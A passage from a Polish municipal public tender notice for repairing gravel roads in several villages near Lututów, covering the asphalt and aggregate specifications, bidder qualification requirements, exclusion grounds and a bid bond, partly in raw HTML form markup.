od km 0+010 do km 0+890 wyrównanie profilu poprzecznego i podłużnego oraz wzmocnienie istniejącej nawierzchni optymalną mieszanką kruszywa łamanego frakcji 0-31,5 średniej grubości 7cm w ilości 184,8m3 zagęszczoną do wskaźnika 1,0. Na odcinku od km 0+000 do km 0+010 i od km 0+890 do km 0+900 należy rozebrać istniejącą nawierzchnię z kruszywa łamanego w celu nawiązania wysokościowego do nawierzchni istniejącej drogi, wykonać koryto, a w nim warstwę odcinającą z piasku gr. 10cm, podbudowę dolną z mieszanki kruszywa łamanego frakcji 0-63 gr. 15cm i podbudowę górną z mieszanki kruszywa łamanego frakcji 0-31,5 gr. 8cm zagęszczone do wskaźnika 1,0 w ilości 60m2. Pobocza szer. 0,75m o przechyłce poprzecznej 8% należy utwardzić na szer. 0,50 m od strony jezdni optymalną mieszanką kruszywa łamanego frakcji 0-63 gr. 15cm w ilości 900,0m2 zagęszczoną do wskaźnika 1,0 i szer. 0,25m uformować z gruntu dowiezio0nego z ukopu w ilości 42,3m3 i uzyskanego z wykopu na ciągu drogi w ilości 7,20m3 zagęszczonego do wskaźnika 0,98. Kruszywo użyte do wyrównania profilu poprzecznego, podbudowy i utwardzenia poboczy winno spełniać wymagania kategorii Gv w tabeli 6 normy PN-EN 13285 ( skała magmowa o dużej wytrzymałości ). Na całej przebudowywanej drogi projektuje się nawierzchnię szer. 3,0m jako warstwę ścieralną z mieszanki mineralno- asfaltowej średnioziarnistej zamkniętej AC11S50/70 dla KR1 grubości 4cm o powierzchni 2700,0m2. Wszystkie materiały użyte do budowy oraz sposób wykonania robót winny odpowiadać wymaganiom norm państwowych.KNAPY: Przedmiotem wykonania zamówienia jest remont drogi gminnej we wsi Knapy na działce nr 30 o długości 600m. Wykonanie robót budowlanych polegać będzie na robotach związanych z wyrównaniem poprzecznym i podłużnym oraz wzmocnieniem istniejącej nawierzchni optymalną mieszanką kruszywa łamanego i wykonaniem warstwy ścieralnej z mieszanki mineralno-asfaltowej średnioziarnistej zamkniętej. Pobocza zostaną w części utwardzone kruszywem i uformowane z gruntu dowiezionego z ukopu. Remont drogi polega na wyrównaniu istniejącej nawierzchni z kruszywa łamanego z nadaniem dwustronnego spadku 2% optymalną mieszanką kruszywa łamanego frakcji 0-31,5- warstwą ścieralną grubości 7cm i szerokości 3,0m na długości 580,0m. Od km 0+000 do km 0+010 i od km 0+590 do km 0+600 tj. długości 10,0m i szer. 3,0m należy rozebrać istniejącą nawierzchnię z kruszywa łamanego wraz z wyokrągleniem skrzyżowania o powierzchni 84,0m2 w celu nawiązania wysokościowego z istniejącą nawierzchnią drogi, wykonać koryto, warstwę odcinającą z piasku gr. 10cm, podbudowę dolną gr. 15cm z mieszanki kruszywa łamanego frakcji 0-63 i górną gr. 8cm z mieszanki kruszywa łamanego frakcji 0-31,5. Należy stosować optymalne kruszywo kategorii Gv w tabeli 6 normy PN-EN 13285 ( skała magmowa o dużej wytrzymałości). Na podbudowie zostanie wykonana nawierzchnia asfaltowa gr. 4cm jako warstwa ścieralna z mieszanki mineralno-asfaltowej średnioziarnistej zamkniętej AC11S50/70 dla KR1 szer. 3,0m na długości 600,0m o powierzchni 1800,0m2 po uprzednim spryskaniu emulsją asfaltową. Na długości 600,0m należy utwardzić obustronnie pobocze szer. 0,50m optymalną mieszanką kruszywa łamanego frakcji 0-63 w ilości 600,0m2 gr. 15cm. Na pozostałej szerokości pobocza 0,25m należy uformować nasyp z gruntu dowiezionego z ukopu i z koryta r. 11cm w ilości 33,0m3.BRZOZOWIEC: Przedmiotem wykonania zamówienia jest remont drogi gminnej we wsi Brzozowiec. Wykonanie robót polegać będzie na robotach związanych z wyrównaniem poprzecznym i podłużnym oraz wzmocnieniem istniejącej nawierzchni optymalną mieszanka kruszywa łamanego i wykonaniem warstwy ścieralnej z mieszanki mineralno-asfaltowej średnioziarnistej zamkniętej. Pobocza zostaną w części utwardzone kruszywem i uformowane z gruntu dowiezionego z ukopu.Remont drogi polega na wyrównaniu istniejącej nawierzchni z kruszywa łamanego z nadaniem dwustronnego spadku 2% optymalną mieszanką kruszywa łamanego frakcji 0-31,5 - warstwą ścieralną grubości 7cm i szerokości 3,0m na długości 580,0m. od km 0+000 do km 0+010 i od km 0+590 do km 0+600 tj. na długości 10,0 i szer. 3,0m należy rozebrać istniejącą nawierzchnię z kruszywa łamanego wraz z zaokrągleniem skrzyżowania o powierzchni 60,0m2 w celu nawiązania wysokościowego z istniejącą nawierzchnią drogi, wykonać koryto, warstwę odcinającą z piasku gr. 10cm, podbudowę dolną gr. 15cm z mieszanki kruszywa łamanego frakcji 0-63 i górną gr. 8cm z mieszanki kruszywa łamanego frakcji 0-31,5. Należy stosować optymalne kruszywo kategorii Gv w tabeli 6 normy PN-EN 13285 (skała magmowa o dużej wytrzymałości). Na podbudowie zostanie wykonana nawierzchnia asfaltowa gr. 4cm jako warstwa ścieralna z mieszanki mineralno-asfaltowej średnioziarnistej zamkniętej AC11S50/70 dla KR1 szer. 3,0m na długości 600,0m o powierzchni 1800,0m2 po uprzednim spryskaniu emulsją asfaltową. Na długości 600,0m należy utwardzić obustronnie pobocze szer. 0,50m optymalną mieszanką kruszywa łamanego frakcji 0-63 w ilości 600,0m2 gr. 15cm. Na pozostałej szerokości pobocza 0,25m należy uformować nasyp z gruntu dowiezionego z ukopu i z koryta gr. 11cm w ilości 33,0m3.OSTRYCHARZE: Przedmiotem wykonania zamówienia jest remont drogi gminnej we wsi Ostrycharze. Projektowany odcinek rozpoczyna się na krawędzi jezdni bitumicznej wcześniej wykonanego odcinka drogi we wsi Augustynów. Wykonanie robót polegać będzie na robotach związanych z wyrównaniem poprzecznym i podłużnym oraz wzmocnieniem istniejącej nawierzchni optymalną mieszanka kruszywa łamanego i wykonaniem warstwy ścieralnej z mieszanki mineralno-asfaltowej średnioziarnistej zamkniętej. Pobocza zostaną w części utwardzone kruszywem i uformowane z gruntu dowiezionego z ukopu.Remont drogi polega na wyrównaniu istniejącej nawierzchni z kruszywa łamanego z nadaniem dwustronnego spadku 2% optymalną mieszanką kruszywa łamanego frakcji 0-31,5 - warstwą ścieralną grubości 7cm i szerokości 3,0m na długości 980,0m. od km 0+000 do km 0+010 i od km 0+990 do km 1+000 tj. na długości 10,0 i szer. 3,0m należy rozebrać istniejącą nawierzchnię z kruszywa łamanego wraz z zaokrągleniem skrzyżowania o powierzchni 84,0m2 w celu nawiązania wysokościowego z istniejącą nawierzchnią drogi, wykonać koryto, warstwę odcinającą z piasku gr. 10cm, podbudowę dolną gr. 15cm z mieszanki kruszywa łamanego frakcji 0-63 i górną gr. 8cm z mieszanki kruszywa łamanego frakcji 0-31,5. Należy stosować optymalne kruszywo kategorii Gv w tabeli 6 normy PN-EN 13285 (skała magmowa o dużej wytrzymałości). Na podbudowie zostanie wykonana nawierzchnia asfaltowa gr. 4cm jako warstwa ścieralna z mieszanki mineralno-asfaltowej średnioziarnistej zamkniętej AC11S50/70 dla KR1 szer. 3,0m na długości 1000,0m o powierzchni 3000,0m2 po uprzednim spryskaniu emulsją asfaltową. Na długości 1000,0m należy utwardzić obustronnie pobocze szer. 0,50m optymalną mieszanką kruszywa łamanego frakcji 0-63 w ilości 1000,0m2 gr. 15cm. Na pozostałej szerokości pobocza 0,25m należy uformować nasyp z gruntu dowiezionego z ukopu i z koryta gr. 11cm w ilości 55,0m3.LUTUTÓW, UL. ZIELONA: Przedmiotem wykonania zamówienia jest remont drogi gminnej położonej w Lututowie - ul. Zielona. Wykonanie robót polegać będzie na robotach związanych z wyrównaniem poprzecznym i podłużnym oraz wzmocnieniem istniejącej nawierzchni optymalną mieszanka kruszywa łamanego i wykonaniem warstwy ścieralnej z mieszanki mineralno-asfaltowej średnioziarnistej zamkniętej. Pobocza zostaną w części utwardzone kruszywem i uformowane z gruntu dowiezionego z ukopu.Remont drogi polega na wyrównaniu istniejącej nawierzchni z kruszywa łamanego z nadaniem dwustronnego spadku 2% optymalną mieszanką kruszywa łamanego frakcji 0-31,5 - warstwą ścieralną grubości 7cm i szerokości 3,0m na długości 180,0m. od km 0+000 do km 0+010 i od km 0+190 do km 0+200 tj. na długości 10,0 i szer. 3,0m należy rozebrać istniejącą nawierzchnię z kruszywa łamanego wraz z zaokrągleniem skrzyżowania o powierzchni 84,0m2 w celu nawiązania wysokościowego z istniejącą nawierzchnią drogi, wykonać koryto, warstwę odcinającą z piasku gr. 10cm, podbudowę dolną gr. 15cm z mieszanki kruszywa łamanego frakcji 0-63 i górną gr. 8cm z mieszanki kruszywa łamanego frakcji 0-31,5. Należy stosować optymalne kruszywo kategorii Gv w tabeli 6 normy PN-EN 13285 (skała magmowa o dużej wytrzymałości). Na podbudowie zostanie wykonana nawierzchnia asfaltowa gr. 4cm jako warstwa ścieralna z mieszanki mineralno-asfaltowej średnioziarnistej zamkniętej AC11S50/70 dla KR1 szer. 3,0m na długości 200,0m o powierzchni 600,0m2 po uprzednim spryskaniu emulsją asfaltową. Na długości 200,0m należy utwardzić obustronnie pobocze szer. 0,50m optymalną mieszanką kruszywa łamanego frakcji 0-63 w ilości 200,0m2 gr. 15cm. Na pozostałej szerokości pobocza 0,25m należy uformować nasyp z gruntu dowiezionego z ukopu i z koryta gr. 11cm w ilości 11,0m3.ŁĘKI MAŁE - DOBROSŁAW: Przedmiotem wykonania zamówienia jest remont drogi gminnej Łęki Małe-Dobrosław. Wykonanie robót polegać będzie na robotach związanych z wyrównaniem poprzecznym i podłużnym oraz wzmocnieniem istniejącej nawierzchni optymalną mieszanka kruszywa łamanego i wykonaniem warstwy ścieralnej z mieszanki mineralno-asfaltowej średnioziarnistej zamkniętej. Pobocza zostaną w części utwardzone kruszywem i uformowane z gruntu dowiezionego z ukopu.Remont drogi polega na wyrównaniu istniejącej nawierzchni z kruszywa łamanego z nadaniem dwustronnego spadku 2% optymalną mieszanką kruszywa łamanego frakcji 0-31,5 - warstwą ścieralną grubości 7cm i szerokości 3,0m na długości 780,0m. Od km 0+000 do km 0+010 i od km 0+790 do km 0+800 tj. na długości 10,0 i szer. 3,0m należy rozebrać istniejącą nawierzchnię z kruszywa łamanego wraz z zaokrągleniem skrzyżowania o powierzchni 84,0m2 w celu nawiązania wysokościowego z istniejącą nawierzchnią drogi, wykonać koryto, warstwę odcinającą z piasku gr. 10cm, podbudowę dolną gr. 15cm z mieszanki kruszywa łamanego frakcji 0-63 i górną gr. 8cm z mieszanki kruszywa łamanego frakcji 0-31,5. Należy stosować optymalne kruszywo kategorii Gv w tabeli 6 normy PN-EN 13285 (skała magmowa o dużej wytrzymałości). Na podbudowie zostanie wykonana nawierzchnia asfaltowa gr. 4cm jako warstwa ścieralna z mieszanki mineralno-asfaltowej średnioziarnistej zamkniętej AC11S50/70 dla KR1 szer. 3,0m na długości 800,0m o powierzchni 2400,0m2 po uprzednim spryskaniu emulsją asfaltową. Na długości 800,0m należy utwardzić obustronnie pobocze szer. 0,50m optymalną mieszanką kruszywa łamanego frakcji 0-63 w ilości 800,0m2 gr. 15cm. Na pozostałej szerokości pobocza 0,25m należy uformować nasyp z gruntu dowiezionego z ukopu i z koryta gr. 11cm w ilości 44,0m3.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45233220-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2019-11-26</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Oświadczenia stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają kwalifikacje zawodowe, doświadczenie i wykształcenie oraz zakres wykonywanych czynności w tym -Kierownik budowy: wykształcenie: techniczne kwalifikacje zawodowe: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogownictwo z godnie z ustawą Prawo budowlane lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Wykonawca powinien przedłożyć: Polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 1.000.000,00zł.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">1. Wykaz niezbędnych do wykonania zamówienia narzędzi, urządzeń i sprzętu jakim dysponuje wykonawca lub podmiot użyczający - niezbędne minimum to: samochód ciężarowy do przewozu masy, rozkładarka do asfaltu i walec samobieżny oraz inne urządzenia potrzebne do wykonania zadania, 2. Oświadczenie, informacja na temat przeciętnej liczby zatrudnionych pracowników lub liczebności personelu kierowniczego w okresie ostatnich trzech lat, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie, jeżeli przedmiotem zamówienia są roboty budowlane lub usługi, 3. Wykaz osób i podmiotów, które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności w tym - Kierownik budowy: wykształcenie techniczne, kwalifikacje zawodowe: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogownictwo zgodnie z ustawą Prawo budowlane lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 2. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 3. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymywanie w całości wykonania decyzji właściwego organu wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Formularz ofertowy 2. Kosztorys ofertowy 3. Projekt umowy 4. Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1a ustawy Prawo zamówień publicznych 5. Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu określonych w art. 24 ust. 1 ustawy Prawo zamówień publicznych 6. Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej 7. Wykaz osób do kontaktów z zamawiającym 8. Wykaz wykonanych robót budowlanych 9. Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakie posiada wykonawca 10. Oświadczenie wykonawcy z art. 25a ust.1 ustawy Prawo zamówień publicznych 11. Oświadczenie wykonawcy o nie zaleganiu z opłacaniem podatków i opłat lokalnych </span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Wadium w kwocie 25000,00zł.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 